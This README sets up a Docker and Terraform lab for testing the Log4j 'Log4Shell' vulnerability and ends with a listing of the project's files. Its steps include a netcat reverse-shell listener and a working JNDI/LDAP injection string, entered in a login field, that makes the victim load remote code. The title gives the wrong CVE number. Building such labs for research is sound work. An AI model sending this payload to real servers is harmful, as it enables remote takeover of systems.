Terraform and Docker resources for quickly spinning up a test of CVE-2021-44428# Introduction
This repository is setup to quickly test the log4j vulnerability using Docker and Hashicorp Terraform. All of the components of this test will run in Docker containers on the Docker network, accessible via 'host.docker.internal'.
# Credits / Disclaimer
This test environment is derived from a great blog post from Raxis: (https://raxis.com/blog/log4j-exploit)
The vulnerable application and exploit code came from cyberxml (https://github.com/cyberxml/log4j-poc).
All I've done is codified the environment to make it easy to spin-up and test this delicious exploit.
_I do not assume any responsibility for adverse effects or malicious actions that may result from the use of the material in this repository. Full stop. It is up to **you** to decide if these materials are trustworthy and it is similarly your responsibility to use this information **ethically**. I merely post these goodies so that reserchers, students, and security professionals can quickly create an environment and test the exploit for themselves. Seacrest out._
# Prerequisites
- Docker Desktop (https://www.docker.com/)
- Hashicorp Terraform (https://www.terraform.io/)
# Setup
1. Clone this repository
2. Run 'terraform init' in the project directory
3. Start the Docker daemon
4. Run the 'docker-build.sh' bash script to build all of the project's container images.
5. Run 'terraform apply' to create all of the containers in the project.
# Exploitation
1. Shell into the log4j_netcat container using 'docker exec -it netcat /bin/bash' or something similar. This is where you will receive your shell connection to the victim server once it's established.
2. In your session within the log4j_netcat container, enter the following command to start the listener:
~~~
nc -lv -s 0.0.0.0 -p 9001
~~~
3. In your browser, navigate to http://host.docker.internal:8080/log4shell/
4. Enter the following into the 'Username' field along with anything you want in the 'Password' field:
~~~
${jndi:ldap://host.docker.internal:1389/a}
~~~
5. Return to the log4j_netcat container shell and observe that you have connected to the victim server.
6. Go and wreak havoc!
[4.0K] /data/pocs/e34e019b8108d5f31d8901d09fe9107d7e36fc01
├── [4.0K] containers
│ ├── [4.0K] exploit
│ │ ├── [ 238] Dockerfile
│ │ └── [4.0K] files
│ │ ├── [ 77] docker-entrypoint.sh
│ │ ├── [4.2K] poc.py
│ │ └── [4.0K] target
│ │ ├── [1.8M] log4shell-1.0-SNAPSHOT.war
│ │ └── [ 41M] marshalsec-0.0.3-SNAPSHOT-all.jar
│ ├── [4.0K] netcat
│ │ ├── [ 131] Dockerfile
│ │ └── [4.0K] files
│ │ └── [ 11] docker-entrypoint.sh
│ ├── [4.0K] payload
│ │ ├── [ 309] Dockerfile
│ │ └── [4.0K] files
│ │ ├── [ 26] docker-entrypoint.sh
│ │ └── [1.1K] Exploit.java
│ └── [4.0K] web
│ ├── [ 31] build.sh
│ ├── [1.2K] Dockerfile
│ ├── [4.0K] files
│ │ ├── [ 96] entrypoint.sh
│ │ └── [4.0K] home
│ │ └── [4.0K] user
│ │ ├── [4.0K] log4j-shell-poc
│ │ │ ├── [ 67] notes.txt
│ │ │ ├── [1.7K] poc.py
│ │ │ ├── [3.3K] README.md
│ │ │ └── [4.0K] vulnerable-application
│ │ │ ├── [2.5K] log4shell.iml
│ │ │ ├── [2.2K] pom.xml
│ │ │ └── [4.0K] src
│ │ │ └── [4.0K] main
│ │ │ ├── [4.0K] java
│ │ │ │ └── [4.0K] com
│ │ │ │ └── [4.0K] example
│ │ │ │ └── [4.0K] log4shell
│ │ │ │ ├── [ 217] log4j.java
│ │ │ │ └── [1.2K] LoginServlet.java
│ │ │ └── [4.0K] webapp
│ │ │ ├── [2.4K] index.jsp
│ │ │ └── [4.0K] WEB-INF
│ │ │ └── [ 304] web.xml
│ │ └── [4.0K] tomcat8
│ │ ├── [4.0K] bin
│ │ │ └── [ 98] setenv.sh
│ │ ├── [4.0K] conf
│ │ │ ├── [4.0K] Catalina
│ │ │ │ └── [4.0K] localhost
│ │ │ │ └── [ 202] manager.xml
│ │ │ ├── [7.1K] server.xml
│ │ │ ├── [1.6K] tomcat-users.xml
│ │ │ └── [165K] web.xml
│ │ └── [4.0K] log4j2
│ │ ├── [4.0K] conf
│ │ │ └── [3.0K] log4j2-tomcat.properties
│ │ └── [4.0K] lib
│ │ ├── [293K] log4j-api-2.14.1.jar
│ │ ├── [ 15K] log4j-appserver-2.14.1.jar
│ │ └── [1.7M] log4j-core-2.14.1.jar
│ └── [ 90] run.sh
├── [ 202] docker-build.sh
├── [1.0K] main.tf
└── [2.1K] README.md
30 directories, 35 files